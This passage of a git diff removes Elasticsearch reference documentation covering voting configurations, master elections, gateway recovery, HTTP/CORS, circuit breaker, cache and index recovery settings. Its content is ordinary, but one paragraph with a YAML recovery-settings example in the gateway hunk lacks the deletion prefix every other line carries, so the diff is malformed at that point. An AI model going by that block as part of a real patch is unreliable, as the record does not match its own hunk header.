If there are two or fewer -master-eligible nodes, they must all remain available. - -After a node has joined or left the cluster the elected master must issue a -cluster-state update that adjusts the voting configuration to match, and this -can take a short time to complete. It is important to wait for this adjustment -to complete before removing more nodes from the cluster. - -[discrete] -==== Master elections - -Elasticsearch uses an election process to agree on an elected master node, both -at startup and if the existing elected master fails. Any master-eligible node -can start an election, and normally the first election that takes place will -succeed. Elections only usually fail when two nodes both happen to start their -elections at about the same time, so elections are scheduled randomly on each -node to reduce the probability of this happening. Nodes will retry elections -until a master is elected, backing off on failure, so that eventually an -election will succeed (with arbitrarily high probability). The scheduling of -master elections are controlled by the <>. - -[discrete] -==== Cluster maintenance, rolling restarts and migrations - -Many cluster maintenance tasks involve temporarily shutting down one or more -nodes and then starting them back up again. By default Elasticsearch can remain -available if one of its master-eligible nodes is taken offline, such as during a -<>. Furthermore, if multiple nodes are stopped -and then started again then it will automatically recover, such as during a -<>. There is no need to take any further -action with the APIs described here in these cases, because the set of master -nodes is not changing permanently. - diff --git a/docs/reference/modules/discovery/voting.asciidoc b/docs/reference/modules/discovery/voting.asciidoc deleted file mode 100644 index 8a318591ce0..00000000000 --- a/docs/reference/modules/discovery/voting.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ -[[modules-discovery-voting]] -=== Voting configurations - -Each {es} cluster has a _voting configuration_, which is the set of -<> whose responses are counted when making -decisions such as electing a new master or committing a new cluster state. -Decisions are made only after a majority (more than half) of the nodes in the -voting configuration respond. - -Usually the voting configuration is the same as the set of all the -master-eligible nodes that are currently in the cluster. However, there are some -situations in which they may be different. - -IMPORTANT: To ensure the cluster remains available, you **must not stop half or -more of the nodes in the voting configuration at the same time**. As long as more -than half of the voting nodes are available, the cluster can work normally. For -example, if there are three or four master-eligible nodes, the cluster -can tolerate one unavailable node. If there are two or fewer master-eligible -nodes, they must all remain available. - -After a node joins or leaves the cluster, {es} reacts by automatically making -corresponding changes to the voting configuration in order to ensure that the -cluster is as resilient as possible. It is important to wait for this adjustment -to complete before you remove more nodes from the cluster. For more information, -see <>. 
-
-The current voting configuration is stored in the cluster state so you can
-inspect its current contents as follows:
-
-[source,console]
--------------------------------------------------
-GET /_cluster/state?filter_path=metadata.cluster_coordination.last_committed_config
--------------------------------------------------
-
-NOTE: The current voting configuration is not necessarily the same as the set of
-all available master-eligible nodes in the cluster. Altering the voting
-configuration involves taking a vote, so it takes some time to adjust the
-configuration as nodes join or leave the cluster. Also, there are situations
-where the most resilient configuration includes unavailable nodes or does not
-include some available nodes. In these situations, the voting configuration
-differs from the set of available master-eligible nodes in the cluster.
-
-Larger voting configurations are usually more resilient, so Elasticsearch
-normally prefers to add master-eligible nodes to the voting configuration after
-they join the cluster. Similarly, if a node in the voting configuration
-leaves the cluster and there is another master-eligible node in the cluster that
-is not in the voting configuration then it is preferable to swap these two nodes
-over. The size of the voting configuration is thus unchanged but its
-resilience increases.
-
-It is not so straightforward to automatically remove nodes from the voting
-configuration after they have left the cluster. Different strategies have
-different benefits and drawbacks, so the right choice depends on how the cluster
-will be used. You can control whether the voting configuration automatically
-shrinks by using the
-<>.
-
-NOTE: If `cluster.auto_shrink_voting_configuration` is set to `true` (which is
-the default and recommended value) and there are at least three master-eligible
-nodes in the cluster, Elasticsearch remains capable of processing cluster state
-updates as long as all but one of its master-eligible nodes are healthy.
-
-There are situations in which Elasticsearch might tolerate the loss of multiple
-nodes, but this is not guaranteed under all sequences of failures. If the
-`cluster.auto_shrink_voting_configuration` setting is `false`, you must remove
-departed nodes from the voting configuration manually. Use the
-<> to achieve the desired level
-of resilience.
-
-No matter how it is configured, Elasticsearch will not suffer from a
-"split-brain" inconsistency. The `cluster.auto_shrink_voting_configuration`
-setting affects only its availability in the event of the failure of some of its
-nodes and the administrative tasks that must be performed as nodes join and
-leave the cluster.
-
-[discrete]
-==== Even numbers of master-eligible nodes
-
-There should normally be an odd number of master-eligible nodes in a cluster.
-If there is an even number, Elasticsearch leaves one of them out of the voting
-configuration to ensure that it has an odd size. This omission does not decrease
-the failure-tolerance of the cluster. In fact, it improves it slightly: if the
-cluster suffers from a network partition that divides it into two equally-sized
-halves then one of the halves will contain a majority of the voting
-configuration and will be able to keep operating. If all of the votes from
-master-eligible nodes were counted, neither side would contain a strict majority
-of the nodes and so the cluster would not be able to make any progress.
- -For instance if there are four master-eligible nodes in the cluster and the -voting configuration contained all of them, any quorum-based decision would -require votes from at least three of them. This situation means that the cluster -can tolerate the loss of only a single master-eligible node. If this cluster -were split into two equal halves, neither half would contain three -master-eligible nodes and the cluster would not be able to make any progress. -If the voting configuration contains only three of the four master-eligible -nodes, however, the cluster is still only fully tolerant to the loss of one -node, but quorum-based decisions require votes from two of the three voting -nodes. In the event of an even split, one half will contain two of the three -voting nodes so that half will remain available. - -[discrete] -==== Setting the initial voting configuration - -When a brand-new cluster starts up for the first time, it must elect its first -master node. To do this election, it needs to know the set of master-eligible -nodes whose votes should count. This initial voting configuration is known as -the _bootstrap configuration_ and is set in the -<>. - -It is important that the bootstrap configuration identifies exactly which nodes -should vote in the first election. It is not sufficient to configure each node -with an expectation of how many nodes there should be in the cluster. It is also -important to note that the bootstrap configuration must come from outside the -cluster: there is no safe way for the cluster to determine the bootstrap -configuration correctly on its own. - -If the bootstrap configuration is not set correctly, when you start a brand-new -cluster there is a risk that you will accidentally form two separate clusters -instead of one. This situation can lead to data loss: you might start using both -clusters before you notice that anything has gone wrong and it is impossible to -merge them together later. - -NOTE: To illustrate the problem with configuring each node to expect a certain -cluster size, imagine starting up a three-node cluster in which each node knows -that it is going to be part of a three-node cluster. A majority of three nodes -is two, so normally the first two nodes to discover each other form a cluster -and the third node joins them a short time later. However, imagine that four -nodes were erroneously started instead of three. In this case, there are enough -nodes to form two separate clusters. Of course if each node is started manually -then it's unlikely that too many nodes are started. If you're using an automated -orchestrator, however, it's certainly possible to get into this situation-- -particularly if the orchestrator is not resilient to failures such as network -partitions. - -The initial quorum is only required the very first time a whole cluster starts -up. New nodes joining an established cluster can safely obtain all the -information they need from the elected master. Nodes that have previously been -part of a cluster will have stored to disk all the information that is required -when they restart. diff --git a/docs/reference/modules/gateway.asciidoc b/docs/reference/modules/gateway.asciidoc deleted file mode 100644 index 0558243f22c..00000000000 --- a/docs/reference/modules/gateway.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[modules-gateway]] -=== Local gateway settings - -The local gateway stores the cluster state and shard data across full -cluster restarts. 
- -The following _static_ settings, which must be set on every master node, -control how long a freshly elected master should wait before it tries to -recover the cluster state and the cluster's data. - -NOTE: These settings only take effect on a full cluster restart. - -`gateway.expected_nodes`:: -(<>) -deprecated:[7.7.0, This setting will be removed in 8.0. Use `gateway.expected_data_nodes` instead.] -Number of data or master nodes expected in the cluster. -Recovery of local shards begins when the expected number of -nodes join the cluster. Defaults to `0`. - -`gateway.expected_master_nodes`:: -(<>) -deprecated:[7.7.0, This setting will be removed in 8.0. Use `gateway.expected_data_nodes` instead.] -Number of master nodes expected in the cluster. -Recovery of local shards begins when the expected number of -master nodes join the cluster. Defaults to `0`. - -`gateway.expected_data_nodes`:: -(<>) -Number of data nodes expected in the cluster. -Recovery of local shards begins when the expected number of -data nodes join the cluster. Defaults to `0`. - -`gateway.recover_after_time`:: -(<>) -If the expected number of nodes is not achieved, the recovery process waits -for the configured amount of time before trying to recover. -Defaults to `5m` if one of the `expected_nodes` settings is configured. -+ -Once the `recover_after_time` duration has timed out, recovery will start -as long as the following conditions are met: - -`gateway.recover_after_nodes`:: -(<>) -deprecated:[7.7.0, This setting will be removed in 8.0. Use `gateway.recover_after_data_nodes` instead.] -Recover as long as this many data or master nodes have joined the cluster. - -`gateway.recover_after_master_nodes`:: -(<>) -deprecated:[7.7.0, This setting will be removed in 8.0. Use `gateway.recover_after_data_nodes` instead.] -Recover as long as this many master nodes have joined the cluster. - -`gateway.recover_after_data_nodes`:: -(<>) -Recover as long as this many data nodes have joined the cluster. - -[[dangling-indices]] -==== Dangling indices - -When a node joins the cluster, if it finds any shards stored in its local data -directory that do not already exist in the cluster, it will consider those -shards to be "dangling". Importing dangling indices -into the cluster using `gateway.auto_import_dangling_indices` is not safe. -Instead, use the <>. Neither -mechanism provides any guarantees as to whether the imported data truly -represents the latest state of the data when the index was still part of -the cluster. - -`gateway.auto_import_dangling_indices`:: - - deprecated:[7.9.0, This setting will be removed in 8.0. You should use the dedicated dangling indices API instead.] - Whether to automatically import dangling indices into the cluster - state, provided no indices already exist with the same name. Defaults - to `false`. - -WARNING: The auto-import functionality was intended as a best effort to help users -who lose all master nodes. For example, if a new master node were to be -started which was unaware of the other indices in the cluster, adding the -old nodes would cause the old indices to be imported, instead of being -deleted. However there are several issues with automatic importing, and -its use is strongly discouraged in favour of the -<. - -WARNING: Losing all master nodes is a situation that should be avoided at -all costs, as it puts your cluster's metadata and data at risk. 
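To tie the recovery settings described earlier on this page together, here is a
purely illustrative sketch (the node counts and timeout are placeholders, not
recommendations) of how a master-eligible node's `elasticsearch.yml` might combine
the non-deprecated settings so that recovery starts as soon as three data nodes
have joined, or after ten minutes once at least two data nodes are present:

[source,yaml]
--------------------------------------------------
# Start recovery immediately once this many data nodes have joined.
gateway.expected_data_nodes: 3

# Otherwise wait up to this long ...
gateway.recover_after_time: 10m

# ... and then recover as long as this many data nodes have joined.
gateway.recover_after_data_nodes: 2
--------------------------------------------------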
diff --git a/docs/reference/modules/http.asciidoc b/docs/reference/modules/http.asciidoc deleted file mode 100644 index b0b88f65402..00000000000 --- a/docs/reference/modules/http.asciidoc +++ /dev/null @@ -1,217 +0,0 @@ -[[modules-http]] -=== HTTP -[[modules-http-description]] -// tag::modules-http-description-tag[] -The HTTP layer exposes {es}'s REST APIs over HTTP. Clients send HTTP requests -to a node in the cluster which either handles it locally or else passes it on -to other nodes for further processing using the <>. - -When possible, consider using {wikipedia}/Keepalive#HTTP_Keepalive[HTTP keep -alive] when connecting for better performance and try to get your favorite -client not to do {wikipedia}/Chunked_transfer_encoding[HTTP chunking]. -// end::modules-http-description-tag[] - -[http-settings] -==== HTTP settings - -The following settings can be configured for HTTP. These settings also use the common <>. - -`http.port`:: -(<>) -A bind port range. Defaults to `9200-9300`. - -`http.publish_port`:: -(<>) -The port that HTTP clients should use when -communicating with this node. Useful when a cluster node is behind a -proxy or firewall and the `http.port` is not directly addressable -from the outside. Defaults to the actual port assigned via `http.port`. - -`http.bind_host`:: -(<>) -The host address to bind the HTTP service to. Defaults to `http.host` (if set) or `network.bind_host`. - -`http.publish_host`:: -(<>) -The host address to publish for HTTP clients to connect to. Defaults to `http.host` (if set) or `network.publish_host`. - -`http.host`:: -(<>) -Used to set the `http.bind_host` and the `http.publish_host`. - -`http.max_content_length`:: -(<>) -Maximum size of an HTTP request body. Defaults to `100mb`. - -`http.max_initial_line_length`:: -(<>) -Maximum size of an HTTP URL. Defaults to `4kb`. - -`http.max_header_size`:: -(<>) -Maximum size of allowed headers. Defaults to `8kb`. - -[[http-compression]] -// tag::http-compression-tag[] -`http.compression` {ess-icon}:: -(<>) -Support for compression when possible (with Accept-Encoding). If HTTPS is enabled, defaults to `false`. Otherwise, defaults to `true`. -+ -Disabling compression for HTTPS mitigates potential security risks, such as a -{wikipedia}/BREACH[BREACH attack]. To compress HTTPS traffic, -you must explicitly set `http.compression` to `true`. -// end::http-compression-tag[] - -`http.compression_level`:: -(<>) -Defines the compression level to use for HTTP responses. Valid values are in the range of 1 (minimum compression) and 9 (maximum compression). Defaults to `3`. - -[[http-cors-enabled]] -// tag::http-cors-enabled-tag[] -`http.cors.enabled` {ess-icon}:: -(<>) -Enable or disable cross-origin resource sharing, which determines whether a browser on another origin can execute requests against {es}. Set to `true` to enable {es} to process pre-flight -{wikipedia}/Cross-origin_resource_sharing[CORS] requests. -{es} will respond to those requests with the `Access-Control-Allow-Origin` header if the `Origin` sent in the request is permitted by the `http.cors.allow-origin` list. Set to `false` (the default) to make {es} ignore the `Origin` request header, effectively disabling CORS requests because {es} will never respond with the `Access-Control-Allow-Origin` response header. -+ -NOTE: If the client does not send a pre-flight request with an `Origin` header or it does not check the response headers from the server to validate the -`Access-Control-Allow-Origin` response header, then cross-origin security is -compromised. 
If CORS is not enabled on {es}, the only way for the client to know is to send a pre-flight request and realize the required response headers are missing. - -// end::http-cors-enabled-tag[] - -[[http-cors-allow-origin]] -// tag::http-cors-allow-origin-tag[] -`http.cors.allow-origin` {ess-icon}:: -(<>) -Which origins to allow. If you prepend and append a forward slash (`/`) to the value, this will be treated as a regular expression, allowing you to support HTTP and HTTPs. For example, using `/https?:\/\/localhost(:[0-9]+)?/` would return the request header appropriately in both cases. Defaults to no origins allowed. -+ -IMPORTANT: A wildcard (`*`) is a valid value but is considered a security risk, as your {es} instance is open to cross origin requests from *anywhere*. - -// end::http-cors-allow-origin-tag[] - -[[http-cors-max-age]] -// tag::http-cors-max-age-tag[] -`http.cors.max-age` {ess-icon}:: -(<>) -Browsers send a "preflight" OPTIONS-request to determine CORS settings. `max-age` defines how long the result should be cached for. Defaults to `1728000` (20 days). -// end::http-cors-max-age-tag[] - -[[http-cors-allow-methods]] -// tag::http-cors-allow-methods-tag[] -`http.cors.allow-methods` {ess-icon}:: -(<>) -Which methods to allow. Defaults to `OPTIONS, HEAD, GET, POST, PUT, DELETE`. -// end::http-cors-allow-methods-tag[] - -[[http-cors-allow-headers]] -// tag::http-cors-allow-headers-tag[] -`http.cors.allow-headers` {ess-icon}:: -(<>) -Which headers to allow. Defaults to `X-Requested-With, Content-Type, Content-Length`. -// end::http-cors-allow-headers-tag[] - -[[http-cors-allow-credentials]] -// tag::http-cors-allow-credentials-tag[] -`http.cors.allow-credentials` {ess-icon}:: -(<>) -Whether the `Access-Control-Allow-Credentials` header should be returned. Defaults to `false`. -+ -NOTE: This header is only returned when the setting is set to `true`. - -// end::http-cors-allow-credentials-tag[] - -`http.detailed_errors.enabled`:: -(<>) -If `true`, enables the output of detailed error messages and stack traces in the response output. Defaults to `true`. -+ -If `false`, use the `error_trace` parameter to <> and return detailed error messages. Otherwise, only a simple message will be returned. - -`http.pipelining.max_events`:: -(<>) -The maximum number of events to be queued up in memory before an HTTP connection is closed, defaults to `10000`. - -`http.max_warning_header_count`:: -(<>) -The maximum number of warning headers in client HTTP responses. Defaults to `unbounded`. - -`http.max_warning_header_size`:: -(<>) -The maximum total size of warning headers in client HTTP responses. Defaults to `unbounded`. - -`http.tcp.no_delay`:: -(<>) -Enable or disable the {wikipedia}/Nagle%27s_algorithm[TCP no delay] -setting. Defaults to `network.tcp.no_delay`. - -`http.tcp.keep_alive`:: -(<>) -Configures the `SO_KEEPALIVE` option for this socket, which -determines whether it sends TCP keepalive probes. -Defaults to `network.tcp.keep_alive`. - -`http.tcp.keep_idle`:: -(<>) Configures the `TCP_KEEPIDLE` option for this socket, which -determines the time in seconds that a connection must be idle before -starting to send TCP keepalive probes. Defaults to `network.tcp.keep_idle`, which -uses the system default. This value cannot exceed `300` seconds. Only applicable on -Linux and macOS, and requires Java 11 or newer. - -`http.tcp.keep_interval`:: -(<>) Configures the `TCP_KEEPINTVL` option for this socket, -which determines the time in seconds between sending TCP keepalive probes. 
-Defaults to `network.tcp.keep_interval`, which uses the system default. -This value cannot exceed `300` seconds. Only applicable on Linux and macOS, and requires -Java 11 or newer. - -`http.tcp.keep_count`:: -(<>) Configures the `TCP_KEEPCNT` option for this socket, which -determines the number of unacknowledged TCP keepalive probes that may be -sent on a connection before it is dropped. Defaults to `network.tcp.keep_count`, -which uses the system default. Only applicable on Linux and macOS, and -requires Java 11 or newer. - -`http.tcp.reuse_address`:: -(<>) -Should an address be reused or not. Defaults to `network.tcp.reuse_address`. - -`http.tcp.send_buffer_size`:: -(<>) -The size of the TCP send buffer (specified with <>). -Defaults to `network.tcp.send_buffer_size`. - -`http.tcp.receive_buffer_size`:: -(<>) -The size of the TCP receive buffer (specified with <>). -Defaults to `network.tcp.receive_buffer_size`. - -[http-rest-request-tracer] -==== REST request tracer - -The HTTP layer has a dedicated tracer logger which, when activated, logs incoming requests. The log can be dynamically activated -by setting the level of the `org.elasticsearch.http.HttpTracer` logger to `TRACE`: - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "transient" : { - "logger.org.elasticsearch.http.HttpTracer" : "TRACE" - } -} --------------------------------------------------- - -You can also control which uris will be traced, using a set of include and exclude wildcard patterns. By default every request will be -traced. - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "transient" : { - "http.tracer.include" : "*", - "http.tracer.exclude" : "" - } -} --------------------------------------------------- diff --git a/docs/reference/modules/indices/circuit_breaker.asciidoc b/docs/reference/modules/indices/circuit_breaker.asciidoc deleted file mode 100644 index 2fd929f85ce..00000000000 --- a/docs/reference/modules/indices/circuit_breaker.asciidoc +++ /dev/null @@ -1,131 +0,0 @@ -[[circuit-breaker]] -=== Circuit breaker settings -[[circuit-breaker-description]] -// tag::circuit-breaker-description-tag[] -{es} contains multiple circuit breakers used to prevent operations from causing an OutOfMemoryError. Each breaker specifies a limit for how much memory it can use. Additionally, there is a parent-level breaker that specifies the total amount of memory that can be used across all breakers. - -Except where noted otherwise, these settings can be dynamically updated on a -live cluster with the <> API. -// end::circuit-breaker-description-tag[] - -[[parent-circuit-breaker]] -[discrete] -==== Parent circuit breaker - -The parent-level breaker can be configured with the following settings: - -`indices.breaker.total.use_real_memory`:: - (<>) - Determines whether the parent breaker should take real - memory usage into account (`true`) or only consider the amount that is - reserved by child circuit breakers (`false`). Defaults to `true`. - -[[indices-breaker-total-limit]] -// tag::indices-breaker-total-limit-tag[] -`indices.breaker.total.limit` {ess-icon}:: - (<>) - Starting limit for overall parent breaker. Defaults to 70% of JVM heap if - `indices.breaker.total.use_real_memory` is `false`. If `indices.breaker.total.use_real_memory` - is `true`, defaults to 95% of the JVM heap. 
-// end::indices-breaker-total-limit-tag[] - -[[fielddata-circuit-breaker]] -[discrete] -==== Field data circuit breaker -The field data circuit breaker estimates the heap memory required to load a -field into the <>. If loading the field would -cause the cache to exceed a predefined memory limit, the circuit breaker stops the -operation and returns an error. - -[[fielddata-circuit-breaker-limit]] -// tag::fielddata-circuit-breaker-limit-tag[] -`indices.breaker.fielddata.limit` {ess-icon}:: - (<>) - Limit for fielddata breaker. Defaults to 40% of JVM heap. -// end::fielddata-circuit-breaker-limit-tag[] - -[[fielddata-circuit-breaker-overhead]] -// tag::fielddata-circuit-breaker-overhead-tag[] -`indices.breaker.fielddata.overhead` {ess-icon}:: - (<>) - A constant that all field data estimations are multiplied with to determine a - final estimation. Defaults to `1.03`. -// end::fielddata-circuit-breaker-overhead-tag[] - -[[request-circuit-breaker]] -[discrete] -==== Request circuit breaker - -The request circuit breaker allows Elasticsearch to prevent per-request data -structures (for example, memory used for calculating aggregations during a -request) from exceeding a certain amount of memory. - -[[request-breaker-limit]] -// tag::request-breaker-limit-tag[] -`indices.breaker.request.limit` {ess-icon}:: - (<>) - Limit for request breaker, defaults to 60% of JVM heap. -// end::request-breaker-limit-tag[] - -[[request-breaker-overhead]] -// tag::request-breaker-overhead-tag[] -`indices.breaker.request.overhead` {ess-icon}:: - (<>) - A constant that all request estimations are multiplied with to determine a - final estimation. Defaults to `1`. -// end::request-breaker-overhead-tag[] - -[[in-flight-circuit-breaker]] -[discrete] -==== In flight requests circuit breaker - -The in flight requests circuit breaker allows Elasticsearch to limit the memory usage of all -currently active incoming requests on transport or HTTP level from exceeding a certain amount of -memory on a node. The memory usage is based on the content length of the request itself. This -circuit breaker also considers that memory is not only needed for representing the raw request but -also as a structured object which is reflected by default overhead. - -`network.breaker.inflight_requests.limit`:: - (<>) - Limit for in flight requests breaker, defaults to 100% of JVM heap. This means that it is bound - by the limit configured for the parent circuit breaker. - -`network.breaker.inflight_requests.overhead`:: - (<>) - A constant that all in flight requests estimations are multiplied with to determine a - final estimation. Defaults to 2. - -[[accounting-circuit-breaker]] -[discrete] -==== Accounting requests circuit breaker - -The accounting circuit breaker allows Elasticsearch to limit the memory -usage of things held in memory that are not released when a request is -completed. This includes things like the Lucene segment memory. - -`indices.breaker.accounting.limit`:: - (<>) - Limit for accounting breaker, defaults to 100% of JVM heap. This means that it is bound - by the limit configured for the parent circuit breaker. - -`indices.breaker.accounting.overhead`:: - (<>) - A constant that all accounting estimations are multiplied with to determine a - final estimation. 
Defaults to 1 - -[[script-compilation-circuit-breaker]] -[discrete] -==== Script compilation circuit breaker - -Slightly different than the previous memory-based circuit breaker, the script -compilation circuit breaker limits the number of inline script compilations -within a period of time. - -See the "prefer-parameters" section of the <> -documentation for more information. - -`script.context.$CONTEXT.max_compilations_rate`:: - (<>) - Limit for the number of unique dynamic scripts within a certain interval - that are allowed to be compiled for a given context. Defaults to `75/5m`, - meaning 75 every 5 minutes. diff --git a/docs/reference/modules/indices/fielddata.asciidoc b/docs/reference/modules/indices/fielddata.asciidoc deleted file mode 100644 index 1383bf74d6d..00000000000 --- a/docs/reference/modules/indices/fielddata.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ -[[modules-fielddata]] -=== Field data cache settings - -The field data cache contains <> and <>, -which are both used to support aggregations on certain field types. -Since these are on-heap data structures, it is important to monitor the cache's use. - -[discrete] -[[fielddata-sizing]] -==== Cache size - -The entries in the cache are expensive to build, so the default behavior is -to keep the cache loaded in memory. The default cache size is unlimited, -causing the cache to grow until it reaches the limit set by the <>. This behavior can be configured. - -If the cache size limit is set, the cache will begin clearing the least-recently-updated -entries in the cache. This setting can automatically avoid the circuit breaker limit, -at the cost of rebuilding the cache as needed. - -If the circuit breaker limit is reached, further requests that increase the cache -size will be prevented. In this case you should manually <>. - -`indices.fielddata.cache.size`:: -(<>) -The max size of the field data cache, eg `38%` of node heap space, or an -absolute value, eg `12GB`. Defaults to unbounded. If you choose to set it, -it should be smaller than <> limit. - -[discrete] -[[fielddata-monitoring]] -==== Monitoring field data - -You can monitor memory usage for field data as well as the field data circuit -breaker using -the <> or the <>. diff --git a/docs/reference/modules/indices/index_management.asciidoc b/docs/reference/modules/indices/index_management.asciidoc deleted file mode 100644 index aba4833af7f..00000000000 --- a/docs/reference/modules/indices/index_management.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[index-management-settings]] -=== Index management settings - -You can use the following cluster settings to enable or disable index management -features. - -[[auto-create-index]] -// tag::auto-create-index-tag[] -`action.auto_create_index` {ess-icon}:: -(<>) -<> if it doesn't already exist and apply any configured index templates. Defaults to `true`. -// end::auto-create-index-tag[] - -[[action-destructive-requires-name]] -// tag::action-destructive-requires-name-tag[] -`action.destructive_requires_name` {ess-icon}:: -(<>) -When set to `true`, you must specify the index name to <>. It is not possible to delete all indices with `_all` or use wildcards. -// end::action-destructive-requires-name-tag[] - -[[cluster-indices-close-enable]] -// tag::cluster-indices-close-enable-tag[] -`cluster.indices.close.enable` {ess-icon}:: -(<>) -Enables <> in {es}. You might enable this setting temporarily to change the analyzer configuration for an existing index. We strongly recommend leaving this set to `false` (the default) otherwise. 
-+ -IMPORTANT: Closed indices are a data loss risk because they are not included when you make cluster configuration changes, such as scaling to a different capacity, failover, and many other operations. Additionally, closed indices can lead to inaccurate disk space counts. - -[[reindex-remote-whitelist]] -// tag::reindex-remote-whitelist[] -`reindex.remote.whitelist` {ess-icon}:: -(<>) -Specifies the hosts that can be <>. Expects a YAML array of `host:port` strings. Consists of a comma-delimited list of `host:port` entries. Defaults to `["\*.io:*", "\*.com:*"]`. -// end::reindex-remote-whitelist[] diff --git a/docs/reference/modules/indices/indexing_buffer.asciidoc b/docs/reference/modules/indices/indexing_buffer.asciidoc deleted file mode 100644 index 0269221f8a3..00000000000 --- a/docs/reference/modules/indices/indexing_buffer.asciidoc +++ /dev/null @@ -1,25 +0,0 @@ -[[indexing-buffer]] -=== Indexing buffer settings - -The indexing buffer is used to store newly indexed documents. When it fills -up, the documents in the buffer are written to a segment on disk. It is divided -between all shards on the node. - -The following settings are _static_ and must be configured on every data node -in the cluster: - -`indices.memory.index_buffer_size`:: -(<>) -Accepts either a percentage or a byte size value. It defaults to `10%`, -meaning that `10%` of the total heap allocated to a node will be used as the -indexing buffer size shared across all shards. - -`indices.memory.min_index_buffer_size`:: -(<>) -If the `index_buffer_size` is specified as a percentage, then this -setting can be used to specify an absolute minimum. Defaults to `48mb`. - -`indices.memory.max_index_buffer_size`:: -(<>) -If the `index_buffer_size` is specified as a percentage, then this -setting can be used to specify an absolute maximum. Defaults to unbounded. diff --git a/docs/reference/modules/indices/query_cache.asciidoc b/docs/reference/modules/indices/query_cache.asciidoc deleted file mode 100644 index 59c7e8c6ce3..00000000000 --- a/docs/reference/modules/indices/query_cache.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ -[[query-cache]] -=== Node query cache settings - -The results of queries used in the filter context are cached in the node query -cache for fast lookup. There is one queries cache per node that is shared by all -shards. The cache uses an LRU eviction policy: when the cache is full, the least -recently used query results are evicted to make way for new data. You cannot -inspect the contents of the query cache. - -Term queries and queries used outside of a filter context are not eligible for -caching. - -By default, the cache holds a maximum of 10000 queries in up to 10% of the total -heap space. To determine if a query is eligible for caching, {es} maintains a -query history to track occurrences. - -Caching is done on a per segment basis if a segment contains at least 10000 -documents and the segment has at least 3% of the total documents of a shard. -Because caching is per segment, merging segments can invalidate cached queries. - -The following setting is _static_ and must be configured on every data node in -the cluster: - -`indices.queries.cache.size`:: -(<>) -Controls the memory size for the filter cache. Accepts -either a percentage value, like `5%`, or an exact value, like `512mb`. Defaults to `10%`. - -[[query-cache-index-settings]] -==== Query cache index settings - -The following setting is an _index_ setting that can be configured on a -per-index basis. 
Can only be set at index creation time or on a -<>: - -`index.queries.cache.enabled`:: -(<>) -Controls whether to enable query caching. Accepts `true` (default) or -`false`. diff --git a/docs/reference/modules/indices/recovery.asciidoc b/docs/reference/modules/indices/recovery.asciidoc deleted file mode 100644 index b598a9b5707..00000000000 --- a/docs/reference/modules/indices/recovery.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[recovery]] -=== Index recovery settings - -Peer recovery syncs data from a primary shard to a new or existing shard copy. - -Peer recovery automatically occurs when {es}: - -* Recreates a shard lost during node failure -* Relocates a shard to another node due to a cluster rebalance or changes to the -<> - -You can view a list of in-progress and completed recoveries using the -<>. - -[discrete] -==== Recovery settings - -`indices.recovery.max_bytes_per_sec`:: -(<>) Limits total inbound and outbound -recovery traffic for each node. Applies to both peer recoveries as well -as snapshot recoveries (i.e., restores from a snapshot). Defaults to `40mb`. -+ -This limit applies to each node separately. If multiple nodes in a cluster -perform recoveries at the same time, the cluster's total recovery traffic may -exceed this limit. -+ -If this limit is too high, ongoing recoveries may consume an excess of bandwidth -and other resources, which can destabilize the cluster. -+ -This is a dynamic setting, which means you can set it in each node's -`elasticsearch.yml` config file and you can update it dynamically using the -<>. If you set it -dynamically then the same limit applies on every node in the cluster. If you do -not set it dynamically then you can set a different limit on each node, which is -useful if some of your nodes have better bandwidth than others. For example, if -you are using <> -then you may be able to give your hot nodes a higher recovery bandwidth limit -than your warm nodes. - -[discrete] -==== Expert peer recovery settings -You can use the following _expert_ setting to manage resources for peer -recoveries. - -`indices.recovery.max_concurrent_file_chunks`:: -(<>, Expert) Number of file chunk requests -sent in parallel for each recovery. Defaults to `2`. -+ -You can increase the value of this setting when the recovery of a single shard -is not reaching the traffic limit set by `indices.recovery.max_bytes_per_sec`. - -`indices.recovery.max_concurrent_operations`:: -(<>, Expert) Number of operations sent -in parallel for each recovery. Defaults to `1`. -+ -Concurrently replaying operations during recovery can be very resource-intensive -and may interfere with indexing, search, and other activities in your cluster. -Do not increase this setting without carefully verifying that your cluster has -the resources available to handle the extra load that will result. - diff --git a/docs/reference/modules/indices/request_cache.asciidoc b/docs/reference/modules/indices/request_cache.asciidoc deleted file mode 100644 index 6208f09bf08..00000000000 --- a/docs/reference/modules/indices/request_cache.asciidoc +++ /dev/null @@ -1,148 +0,0 @@ -[[shard-request-cache]] -=== Shard request cache settings - -When a search request is run against an index or against many indices, each -involved shard executes the search locally and returns its local results to -the _coordinating node_, which combines these shard-level results into a -``global'' result set. - -The shard-level request cache module caches the local results on each shard. 
-This allows frequently used (and potentially heavy) search requests to return -results almost instantly. The requests cache is a very good fit for the logging -use case, where only the most recent index is being actively updated -- -results from older indices will be served directly from the cache. - -[IMPORTANT] -=================================== - -By default, the requests cache will only cache the results of search requests -where `size=0`, so it will not cache `hits`, -but it will cache `hits.total`, <>, and -<>. - -Most queries that use `now` (see <>) cannot be cached. - -Scripted queries that use the API calls which are non-deterministic, such as -`Math.random()` or `new Date()` are not cached. -=================================== - -[discrete] -==== Cache invalidation - -The cache is smart -- it keeps the same _near real-time_ promise as uncached -search. - -Cached results are invalidated automatically whenever the shard refreshes, but -only if the data in the shard has actually changed. In other words, you will -always get the same results from the cache as you would for an uncached search -request. - -The longer the refresh interval, the longer that cached entries will remain -valid. If the cache is full, the least recently used cache keys will be -evicted. - -The cache can be expired manually with the <>: - -[source,console] ------------------------- -POST /my-index-000001,my-index-000002/_cache/clear?request=true ------------------------- -// TEST[s/^/PUT my-index-000001\nPUT my-index-000002\n/] - -[discrete] -==== Enabling and disabling caching - -The cache is enabled by default, but can be disabled when creating a new -index as follows: - -[source,console] ------------------------------ -PUT /my-index-000001 -{ - "settings": { - "index.requests.cache.enable": false - } -} ------------------------------ - -It can also be enabled or disabled dynamically on an existing index with the -<> API: - -[source,console] ------------------------------ -PUT /my-index-000001/_settings -{ "index.requests.cache.enable": true } ------------------------------ -// TEST[continued] - - -[discrete] -==== Enabling and disabling caching per request - -The `request_cache` query-string parameter can be used to enable or disable -caching on a *per-request* basis. If set, it overrides the index-level setting: - -[source,console] ------------------------------ -GET /my-index-000001/_search?request_cache=true -{ - "size": 0, - "aggs": { - "popular_colors": { - "terms": { - 